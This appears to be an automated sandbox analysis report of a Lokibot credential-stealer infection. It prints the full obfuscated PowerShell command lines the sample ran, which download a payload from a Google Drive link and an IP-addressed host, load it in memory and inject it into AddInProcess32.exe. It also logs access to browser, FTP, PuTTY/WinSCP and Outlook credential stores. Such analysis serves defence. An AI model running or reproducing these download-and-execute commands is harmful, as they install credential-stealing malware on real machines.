Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgi0beg4icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflqzsagicagicagicagicagicagicagicagicagicagicaglu1lbwjfcmrlzklosvrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24urgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagihpsr2dqchbflhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrflcbfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbwsxlhvnusdwludcagicagicagicagicagicagicagicagicagicagicagayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagie9jvgloslj5wsk7jyagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicjtiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagwxdvqmnht2duasagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgi0beg4ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms8zns9lzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnrjriisiirftny6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyismcwwkttzdgfsvc1zbevlucgzkttzvgfsvcagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxlzhvjyxrpb25hbhroaw5nc3dpdghncmvhdgf0dgl0dwrlb25ozxjllnziuyi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrftny6q29tu3blq1s0lde1ldi1xs1kb0lujycpkcaojzbrywltywdlvxjsid0gzjdwahqnkyd0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dscrj3igzjdwozbryxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7mffhaw1hz2vcexrlcya9idbryxdlyknsawvudc5eb3dubg9hzerhdgeomffhaw1hz2vvcmwnkycpoycrjzbrywltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkdbrywltywdlqnl0zxmpozbryxn0yxj0rmxhzya9igy3vjw8qkftrty0x1nuqvjupj5mn1y7mffhzw5krmxhzya9igy3vjw8qkftrty0x0vord4+zjdwoycrjzbryxn0yxj0sw5kzxggpsawuwfpbwfnjysnzvrlehqusw5kzxhpzigwuwfzdgfyjysndezsywcpozbrywvuzeluzgv4id0nkycgmffhaw1hz2vuzxh0lkluzgv4t2yomffhzw5krmxhzyk7mffhc3rhcnrjbmrlecatz2ugmcatjysnyw5kidbrywvuzeluzgv4ic1ndcawuwfzdgfydeluzgv4ozbryxn0yxj0sw5kzxggkz0gmffhc3rhcnrgbgfnlkxlbmd0adswuwfijysnyxnlnjrmzw5ndgggjysnpsawuwflbmrjbmrlecatidbryxn0yxj0sw5kzxg7mccrj1fhymfzzty0q29tbwfuzca9idbrywltywdlvgv4dc5tdwjzdhjpbmcomffhc3rhcnrjbmrlecwgmffhymfzzscrjzy0tgvuz3roktswuwfiyxnlnjrszxzlcnnljysnzca9ic1qb2luicgwuwfiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgwwjjiezvckvhy2gtt2jqzwn0ihsgmffhxyb9kvstms4ulsgwuwfiyxnlnjrdb21tyscrj25klkxlbmd0acldozbrywnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcomffhymfzzty0umv2zxjzzwqpozbrywxvywrlzefzjysnc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6jysntg9hzcgwuwfjb21tyw5kqnl0zxmpozbryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qozjdwvkfjzjdwktswuwf2ywlnzxrob2qusw52b2tlkdbryw51bgwsieaozjdwdhh0lljsrvbmtvmvntmvmtqxljy3ms4zlji5ms8vonb0dghmn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigy3vmrlc2f0axzhzg9mn1ysigynkyc3vkfkzeluuhjvy2vzczmyzjdwlcbmn1zkzxnhdccrj2l2ywrvzjdwlcbmn1zkzxmnkydhdgl2ywrvzjdwlgy3vmrlc2f0axzhzg9mn1ysjysnzjdwzgvzyxrpdmfkb2y3vixmn1zkzxnhdgknkyd2ywrvzjdwjysnlgy3vmrlc2f0jysnaxzhzg9mn1yszjdwzgvzyxrpdmfkb2y3vixmn1yxzjdwlgy3vmrlc2f0axzhzg9mn1ypktsnks5szxbsqunfkchby2hbcl04ostby2hbcl05octby2hbcl03myksj3wnks5szxbsqunfkcdmn1ynlfttdhjjtkddw2noqxjdmzkplljlcgxbq0uokftjaefyxtq4k1tjaefyxtgxk1tjaefyxtk3kswnjccpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( ('0qaimageurl = f7vht'+'tps://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywu'+'r f7v;0qawebclient = new-object system.net.webclient;0qaimagebytes = 0qawebclient.downloaddata(0qaimageurl'+');'+'0qaimagetext = [system.text.encoding]::utf8.getstring(0qaimagebytes);0qastartflag = f7v<<base64_start>>f7v;0qaendflag = f7v<<base64_end>>f7v;'+'0qastartindex = 0qaimag'+'etext.indexof(0qastar'+'tflag);0qaendindex ='+' 0qaimagetext.indexof(0qaendflag);0qastartindex -ge 0 -'+'and 0qaendindex -gt 0qastartindex;0qastartindex += 0qastartflag.length;0qab'+'ase64length '+'= 0qaendindex - 0qastartindex;0'+'qabase64command = 0qaimagetext.substring(0qastartindex, 0qabase'+'64length);0qabase64reverse'+'d = -join (0qabase64command.tochararray() ybi foreach-object { 0qa_ })[-1..-(0qabase64comma'+'nd.length)];0qacommandbytes = [system.convert]::frombase64string(0qabase64reversed);0qaloadedas'+'sembly = [system.reflection.assembly]::'+'load(0qacommandbytes);0qavaimethod = [dnlib.io.home].getmethod(f7vvaif7v);0qavaimethod.invoke(0qanull, @(f7vtxt.rreplms/53/141.671.3.291//:ptthf7v, f7vdesativadof7v, f7vdesativadof7v, f7vdesativadof7v, f'+'7vaddinprocess32f7v, f7vdesat'+'ivadof7v, f7vdes'+'ativadof7v,f7vdesativadof7v,'+'f7vdesativadof7v,f7vdesati'+'vadof7v'+',f7vdesat'+'ivadof7v,f7vdesativadof7v,f7v1f7v,f7vdesativadof7v));').replace(([char]89+[char]98+[char]73),'\|').replace('f7v',[string][char]39).replace(([char]48+[char]81+[char]97),'$') )"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_00406069 GetUserNameW,

16_2_00406069

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000010.00000002.621074045.0000000000900000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: PopPassword		16_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: SmtpPassword		16_2_0040D069

Source: Yara match	File source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	23 Exploitation for Client Execution	121 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 Account Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	121 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	21 Obfuscated Files or Information	2 Credentials in Registry	2 File and Directory Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	211 Process Injection	1 Install Root Certificate	Security Account Manager	14 System Information Discovery	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
